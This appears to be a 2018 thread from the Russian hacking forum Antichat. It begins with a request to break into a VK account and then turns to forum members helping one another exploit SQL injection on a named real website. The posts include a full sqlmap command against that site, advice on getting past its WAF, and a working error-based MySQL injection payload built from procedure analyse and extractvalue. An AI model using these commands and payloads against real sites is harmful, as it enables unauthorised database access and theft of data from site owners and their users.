 |
|
07.04.2018, 18:45
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от 17919
↑
как аккаунт вк открыть?
судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
|
|
|
07.04.2018, 21:10
|
|
Новичок
Регистрация: 26.01.2016
Сообщений: 14
С нами:
5419766
Репутация:
0
|
|
Сообщение от Gorev
↑
судя по постам в разных темах, то для тебя только один вариант, написать на бумажке аккаунт и встав на колени перед ним молить великого Бога контакта и всея соцсети что бы он открылся
с чего такой детский вывод?
|
|
|
|
08.04.2018, 00:53
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами:
8859263
Репутация:
334
|
|
Сообщение от 17919
↑
с чего такой детский вывод?
|
|
|
|
08.04.2018, 21:27
|
|
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами:
5738006
Репутация:
147
|
|
хз, на счёт sqli, и не помню чтоб такое дисклоузили, а вот xxe там пофиксили 2 месяца назад...
опять же это то, что из открытого
|
|
|
|
10.04.2018, 03:29
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
похоже на WAF
попробуй --current-user
бывает такое что базу не достает, но пользователя бд читает.
еще вариант искать другу скулю на сайте, возможно где будет UNION или error based.
|
|
|
|
17.04.2018, 00:03
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами:
7782806
Репутация:
0
|
|
нмап не может раскрутить скулу
.SpoilerTarget" type="button">Spoiler: 2
sqlmap -u http://wellaprof.elle.ru/competition...=date&offset=9 --dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет? |
|
|
|
17.04.2018, 00:41
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами:
5745206
Репутация:
1
|
|
Сообщение от Muracha
↑
нмап не может раскрутить скулу
Spoiler: 2
sqlmap -u
http://wellaprof.elle.ru/competition...=date&offset=9
--dbs --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --current-user
Остальные скрипты тоже.
Ручками так выходит ошибка:
Incorrect usage of UNION and ORDER BY
Проблема в фильтрации или на самом деле скули там нет?
Скуля там есть это 100%
по ошибке всё ясно там может waf стоит ща сам гляну
|
|
|
|
17.04.2018, 00:44
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами:
5745206
Репутация:
1
|
|
|
|
|
|
17.04.2018, 01:17
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами:
7782806
Репутация:
0
|
|
Сообщение от Sensoft
↑
http://wellaprof.elle.ru/competition?order_by=date&offset=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHA R(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(10 5),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97 )))),1)-- 1
Спасибо, почему на конце -- 1? А не -- или /*
|
|
|
|
17.04.2018, 01:56
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
С нами:
7782806
Репутация:
0
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
